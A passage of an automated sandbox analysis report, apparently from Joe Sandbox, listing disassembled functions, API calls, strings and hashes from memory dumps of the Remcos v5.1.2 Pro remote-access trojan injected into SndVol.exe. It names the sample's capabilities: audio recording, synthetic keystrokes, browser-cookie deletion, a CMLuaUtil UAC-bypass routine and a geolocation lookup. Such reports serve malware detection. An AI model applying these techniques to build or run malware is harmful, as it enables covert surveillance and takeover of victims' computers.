                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 2917AEA3
                                                                        • __freea.LIBCMT ref: 2917AEB0
                                                                          • Part of subcall function 291761B8: HeapAlloc.KERNEL32(00000000,29165329,?,?,291688C7,?,?,00000000,?,?,2913DE9D,29165329,?,?,?,?), ref: 291761EA
                                                                        • __freea.LIBCMT ref: 2917AEB9
                                                                        • __freea.LIBCMT ref: 2917AEDE
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                        • String ID:
                                                                        • API String ID: 2597970681-0
                                                                        • Opcode ID: 9531322a7bb5a8e9561564ae9e3380b0355aeae01c636b23834d9330bb2a8679
                                                                        • Instruction ID: 39738ebd43145aeba56ac8effb7b99fa0607ebd4bd811207b749ccfdd13d3451
                                                                        • Opcode Fuzzy Hash: 9531322a7bb5a8e9561564ae9e3380b0355aeae01c636b23834d9330bb2a8679
                                                                        • Instruction Fuzzy Hash: BE51E372A00317ABDB198EA2CD44EEB77B9EF44658F118629FD14D6180EF34DE4286A0
                                                                        Function 291499DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendInput.USER32 ref: 29149A25
                                                                        • SendInput.USER32(00000001,?,0000001C,00000000), ref: 29149A4D
                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 29149A74
                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 29149A92
                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 29149AB2
                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 29149AD7
                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 29149AF9
                                                                        • SendInput.USER32(00000001,00000000,0000001C), ref: 29149B1C
                                                                          • Part of subcall function 291499CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 291499D4
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InputSend$Virtual
                                                                        • String ID:
                                                                        • API String ID: 1167301434-0
                                                                        • Opcode ID: 5e920e99d7644890d44b477362f27a6ec8cdef5e1370ce4a6de43f0612ac761e
                                                                        • Instruction ID: e4f3c37ae1a7b6aa6147cdc232b27edc79cf60201cdbdd3d996489cf48851a40
                                                                        • Opcode Fuzzy Hash: 5e920e99d7644890d44b477362f27a6ec8cdef5e1370ce4a6de43f0612ac761e
                                                                        • Instruction Fuzzy Hash: DF319F21648349A9E210DFA6DC44F9FFBECAFD9F44F00280FB58457194CAA0CA4D8767
                                                                        Function 29179210 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 29179292
                                                                        • _free.LIBCMT ref: 291792B6
                                                                        • _free.LIBCMT ref: 2917943D
                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,2918F244), ref: 2917944F
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,291A2764,000000FF,00000000,0000003F,00000000,?,?), ref: 291794C7
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,291A27B8,000000FF,?,0000003F,00000000,?), ref: 291794F4
                                                                        • _free.LIBCMT ref: 29179609
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                        • String ID:
                                                                        • API String ID: 314583886-0
                                                                        • Opcode ID: 2f42bdf7f1f03ab1ea2b99e5797b3bc894a60e083fa76204a044590d1be6b9b9
                                                                        • Instruction ID: 4b1f1be91f14bc533c41af81c547281f3178a68b225e7be7ff8c88dd06b788d5
                                                                        • Opcode Fuzzy Hash: 2f42bdf7f1f03ab1ea2b99e5797b3bc894a60e083fa76204a044590d1be6b9b9
                                                                        • Instruction Fuzzy Hash: 55C12771E0434AABD7089F7BCC40AEA7BB9EF59358F20459AD58497289E7308F47C760
                                                                        Function 29180AA5 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 9fcb998b92cebf10e1910a72b83644caf4b35a96b1599b5d91c1c470ee262a67
                                                                        • Instruction ID: d3d4cdb7139502ca6b82e6c2c66227a13e74c2ce0aaa1cd2565e7507ad1e7868
                                                                        • Opcode Fuzzy Hash: 9fcb998b92cebf10e1910a72b83644caf4b35a96b1599b5d91c1c470ee262a67
                                                                        • Instruction Fuzzy Hash: 9E61CF71D00209AFEB54CF6A8841BDABBF5FF04754F1086AAD954EB241E7709E42DF50
                                                                        Function 044717C2 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                                                        • Instruction ID: 3ac5db0ce342c7b7889c98e53a70e0d495e25fc0d0d9318f8ab6e372de83a027
                                                                        • Opcode Fuzzy Hash: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                                                        • Instruction Fuzzy Hash: 6461B0B1900205AFEF20CF69C841BEABBF5EB44724F14416BE945EB396E630A943DB50
                                                                        Function 2917B43C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,2917BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 2917B47E
                                                                        • __fassign.LIBCMT ref: 2917B4F9
                                                                        • __fassign.LIBCMT ref: 2917B514
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 2917B53A
                                                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,2917BBB1,00000000,?,?,?,?,?,?,?,?,?,2917BBB1,?), ref: 2917B559
                                                                        • WriteFile.KERNEL32(?,?,00000001,2917BBB1,00000000,?,?,?,?,?,?,?,?,?,2917BBB1,?), ref: 2917B592
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                        • String ID:
                                                                        • API String ID: 1324828854-0
                                                                        • Opcode ID: fb1977a7d1ef825ce6f7d62c4b59b5c8fb1672b1ff6308de2ad1d7a1fbf5eeae
                                                                        • Instruction ID: 9ace263e1417b2a0bd844158df7b30f560250152ed49ff69791bbc887f1678b9
                                                                        • Opcode Fuzzy Hash: fb1977a7d1ef825ce6f7d62c4b59b5c8fb1672b1ff6308de2ad1d7a1fbf5eeae
                                                                        • Instruction Fuzzy Hash: E65192B0A4034AAFDB04CFA5D885AEEBBF5FF09314F14455EE955E7281D7309A42CBA0
                                                                        Function 29131D0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _strftime.LIBCMT ref: 29131D50
                                                                          • Part of subcall function 29131A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 29131AD9
                                                                        • waveInUnprepareHeader.WINMM(291A2A88,00000020,00000000,?), ref: 29131E02
                                                                        • waveInPrepareHeader.WINMM(291A2A88,00000020), ref: 29131E40
                                                                        • waveInAddBuffer.WINMM(291A2A88,00000020), ref: 29131E4F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                        • String ID: %Y-%m-%d %H.%M$.wav
                                                                        • API String ID: 3809562944-3597965672
                                                                        • Opcode ID: fc05df8fd04d9d533ba70a348034edccf6e5cf65d667ff0a9eca781ffba73b79
                                                                        • Instruction ID: 49c848e27d38eed6fa1d5dfe07928adfbbd212e000952c22099322d80f440164
                                                                        • Opcode Fuzzy Hash: fc05df8fd04d9d533ba70a348034edccf6e5cf65d667ff0a9eca781ffba73b79
                                                                        • Instruction Fuzzy Hash: 2031C431604344AFE368EB23DC40A9EB7B9BB64214F909829E149D3494EF34AF0ACB55
                                                                        Function 2913BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 291435E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 29143605
                                                                          • Part of subcall function 291435E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 29143622
                                                                          • Part of subcall function 291435E1: RegCloseKey.KERNEL32(?), ref: 2914362D
                                                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 2913BFA6
                                                                        • PathFileExistsA.SHLWAPI(?), ref: 2913BFB3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                        • API String ID: 1133728706-4073444585
                                                                        • Opcode ID: 288623b2510f2987dea5d60f94d2fe6c62cb5f0cf1a43adc85058f2cde761814
                                                                        • Instruction ID: a271c32efffb608dd31b0134384bcb5c73cca8bdbd39750587dba58d06c2f00d
                                                                        • Opcode Fuzzy Hash: 288623b2510f2987dea5d60f94d2fe6c62cb5f0cf1a43adc85058f2cde761814
                                                                        • Instruction Fuzzy Hash: 37216131E101487AEB44F7F3CC95DEE77396F25248FC05118D90267184EB21AB4BCAA5
                                                                        Function 29186BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ab0edb876e8e91016902f164f80f3d8002d9f5e29253d65a21e313d9dad0d3ca
                                                                        • Instruction ID: 9a730f9d93f155b7469bce23fc6c861f9059924e2b5240b9b1dfe8c8335e96b5
                                                                        • Opcode Fuzzy Hash: ab0edb876e8e91016902f164f80f3d8002d9f5e29253d65a21e313d9dad0d3ca
                                                                        • Instruction Fuzzy Hash: 5B11E7B2A05315BBEB115F779C0CD9B3A6CFF817B8B019619B825C6180DB358B029BA0
                                                                        Function 2914B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 2914B438
                                                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 2914B44E
                                                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 2914B467
                                                                        • InternetCloseHandle.WININET(00000000), ref: 2914B4AD
                                                                        • InternetCloseHandle.WININET(00000000), ref: 2914B4B0
                                                                        Strings
                                                                        • http://geoplugin.net/json.gp, xrefs: 2914B448
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Internet$CloseHandleOpen$FileRead
                                                                        • String ID: http://geoplugin.net/json.gp
                                                                        • API String ID: 3121278467-91888290
                                                                        • Opcode ID: 93fa202314e9723250bcb1f17f035aab629640f4c5730cc4b55ef72e90121a7f
                                                                        • Instruction ID: 2c7186f16bf20fe82148a0242f9060cbd2be9f2be1f3c88361a2273684871e3f
                                                                        • Opcode Fuzzy Hash: 93fa202314e9723250bcb1f17f035aab629640f4c5730cc4b55ef72e90121a7f
                                                                        • Instruction Fuzzy Hash: 9711E7316063657BE328AE27DC88DAF7FACEF95668F40042DF80592140DB649A09C6F6
                                                                        Function 29180F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 29180CC1: _free.LIBCMT ref: 29180CEA
                                                                        • _free.LIBCMT ref: 29180FC8
                                                                          • Part of subcall function 29176802: HeapFree.KERNEL32(00000000,00000000,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?), ref: 29176818
                                                                          • Part of subcall function 29176802: GetLastError.KERNEL32(?,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?,?), ref: 2917682A
                                                                        • _free.LIBCMT ref: 29180FD3
                                                                        • _free.LIBCMT ref: 29180FDE
                                                                        • _free.LIBCMT ref: 29181032
                                                                        • _free.LIBCMT ref: 2918103D
                                                                        • _free.LIBCMT ref: 29181048
                                                                        • _free.LIBCMT ref: 29181053
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                        • Instruction ID: 29f1d2ef5448d12e7fa27acb4dd7c0c96ea2959cdfee7ea0c8302e4028a6ef02
                                                                        • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                        • Instruction Fuzzy Hash: 3E11B431501708BEE660AF73CC1AFCB77ECAF11308F40DD24AAA9A6150D7A4B7126B41
                                                                        Function 04471C97 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                        • Instruction ID: 2a047dec6373817fc01bb5ed2575e4daae4643b8c4f3facc9aa27859162bbadb
                                                                        • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                        • Instruction Fuzzy Hash: DD114FB1641B04AAEE20BBB2CC05FCB779D5F00708F404C1FA2DA76697DA65B5068B51
                                                                        Function 04431EBB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 04431EC8
                                                                        • int.LIBCPMT ref: 04431EDB
                                                                          • Part of subcall function 0442EE19: std::_Lockit::_Lockit.LIBCPMT ref: 0442EE2A
                                                                          • Part of subcall function 0442EE19: std::_Lockit::~_Lockit.LIBCPMT ref: 0442EE44
                                                                        • std::_Facet_Register.LIBCPMT ref: 04431F1B
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 04431F24
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 04431F42
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                        • String ID: (mG
                                                                        • API String ID: 2536120697-4059303827
                                                                        • Opcode ID: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                                                        • Instruction ID: f84ec4f3d69303dfcd66e93e510a10f0f2b8199f86cee5ecf2334421406b1a4a
                                                                        • Opcode Fuzzy Hash: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                                                        • Instruction Fuzzy Hash: E6110A32904124A7DF10FB9AD9048DEB768DF44725B61416FFC09972A1DF31BD41CB80
                                                                        Function 2916A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,2916A3D1,2916933E), ref: 2916A3E8
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 2916A3F6
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2916A40F
                                                                        • SetLastError.KERNEL32(00000000,?,2916A3D1,2916933E), ref: 2916A461
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLastValue___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 3852720340-0
                                                                        • Opcode ID: db66f363b2c3cf94628eb8533de8e3800cb3d710439ed2553c80fbdb568ea6c3
                                                                        • Instruction ID: f09682a74054edd25f941ba613755bfd7144583006d757c9c249c407cb607125
                                                                        • Opcode Fuzzy Hash: db66f363b2c3cf94628eb8533de8e3800cb3d710439ed2553c80fbdb568ea6c3
                                                                        • Instruction Fuzzy Hash: 70014C37F0D3556EA3092AB77C89AAB364BEB112FD320933AE524850F4EF550E639144
                                                                        Function 291375EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\SysWOW64\SndVol.exe), ref: 2913760B
                                                                          • Part of subcall function 29137538: _wcslen.LIBCMT ref: 2913755C
                                                                          • Part of subcall function 29137538: CoGetObject.OLE32(?,00000024,29196528,00000000), ref: 291375BD
                                                                        • CoUninitialize.OLE32 ref: 29137664
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InitializeObjectUninitialize_wcslen
                                                                        • String ID: C:\Windows\SysWOW64\SndVol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                        • API String ID: 3851391207-991305910
                                                                        • Opcode ID: b5c5351d7a64bc286a9234b6bb77ba29cd0177723b320a6f3b13b23d9b5eda7b
                                                                        • Instruction ID: b4cd22f5c9a39991ea8d6fdac1c7394277d7c059ddfb4f44adc291997bfcb002
                                                                        • Opcode Fuzzy Hash: b5c5351d7a64bc286a9234b6bb77ba29cd0177723b320a6f3b13b23d9b5eda7b
                                                                        • Instruction Fuzzy Hash: 8601D2B27052046BF3185A57DC4AFAB3768DF40A79FD1412EF50086140DB60EE0346B9
                                                                        Function 2913BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 2913BB18
                                                                        • GetLastError.KERNEL32 ref: 2913BB22
                                                                        Strings
                                                                        • UserProfile, xrefs: 2913BAE8
                                                                        • [Chrome Cookies not found], xrefs: 2913BB3C
                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 2913BAE3
                                                                        • [Chrome Cookies found, cleared!], xrefs: 2913BB48
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteErrorFileLast
                                                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                        • API String ID: 2018770650-304995407
                                                                        • Opcode ID: 61de1e1bfa97dbe0847e7b4cb36f02732e11c43c65b8a9368f0cc22c01a1b1cb
                                                                        • Instruction ID: fca839772ef1fd2e694fd9e70643ef7c221bdc4f901857676239b29e79caab34
                                                                        • Opcode Fuzzy Hash: 61de1e1bfa97dbe0847e7b4cb36f02732e11c43c65b8a9368f0cc22c01a1b1cb
                                                                        • Instruction Fuzzy Hash: AE01A231E940087B6B48B7B7CC568BE7739AA3119CBC09129E4066219CFE069B0B86D6
                                                                        Function 2914CE2C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • AllocConsole.KERNEL32(291A5338), ref: 2914CE35
                                                                        • ShowWindow.USER32(00000000,00000000), ref: 2914CE4E
                                                                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 2914CE73
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Console$AllocOutputShowWindow
                                                                        • String ID: Remcos v$5.1.2 Pro$CONOUT$
                                                                        • API String ID: 2425139147-1584637518
                                                                        • Opcode ID: f200817ff015f5be90f6b400b02e80cdd4cf4cfbd44c7262f04ef15406a94603
                                                                        • Instruction ID: a5f2ba10cb5b83ed8dd2d46446557f1ba1f4d1af589237a52db37d74dddc3165
                                                                        • Opcode Fuzzy Hash: f200817ff015f5be90f6b400b02e80cdd4cf4cfbd44c7262f04ef15406a94603
                                                                        • Instruction Fuzzy Hash: 2E017571E503087BF710F7F38D89FCDB7BCAB25709F901411B608A7089D7689B158661
                                                                        Function 2916AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __allrem.LIBCMT ref: 2916ACE9
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2916AD05
                                                                        • __allrem.LIBCMT ref: 2916AD1C
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2916AD3A
                                                                        • __allrem.LIBCMT ref: 2916AD51
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2916AD6F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                        • String ID:
                                                                        • API String ID: 1992179935-0
                                                                        • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                        • Instruction ID: 39c4493f04e3957310524b07294e161959e650859e75c33084491ce9da8a10ad
                                                                        • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                        • Instruction Fuzzy Hash: 5C811B72E007066BE3149E2BCC41B9A73B9AF9076CF10452AE511D66E1E774EB938790
                                                                        Function 0445B879 Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __allrem.LIBCMT ref: 0445BA06
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0445BA22
                                                                        • __allrem.LIBCMT ref: 0445BA39
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0445BA57
                                                                        • __allrem.LIBCMT ref: 0445BA6E
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0445BA8C
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                        • String ID:
                                                                        • API String ID: 1992179935-0
                                                                        • Opcode ID: 6f0b9a52672becd6d12090cab2f29d952f5634d7502a8c5c8529f3b178371a34
                                                                        • Instruction ID: 8e363ee7dec14c2d50bffcead99a25eeb0da54ebad9f7dd35b575ccd9e48b398
                                                                        • Opcode Fuzzy Hash: 6f0b9a52672becd6d12090cab2f29d952f5634d7502a8c5c8529f3b178371a34
                                                                        • Instruction Fuzzy Hash: 2281E772600B45ABFF21AE6ACC41B6B73A8EF41724F24412FE911D67A3E770F9408751
                                                                        Function 29141D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 291417D7: SetLastError.KERNEL32(0000000D,29141D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,29141D35), ref: 291417DD
                                                                        • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,29141D35), ref: 29141D72
                                                                        • GetNativeSystemInfo.KERNEL32(?,2913D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,29141D35), ref: 29141DE0
                                                                        • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 29141E04
                                                                          • Part of subcall function 29141CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,29141E22,?,00000000,00003000,00000040,00000000,?,?), ref: 29141CEE
                                                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 29141E4B
                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 29141E52
                                                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 29141F65
                                                                          • Part of subcall function 291420B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,29141F72,?,?,?,?,?), ref: 29142122
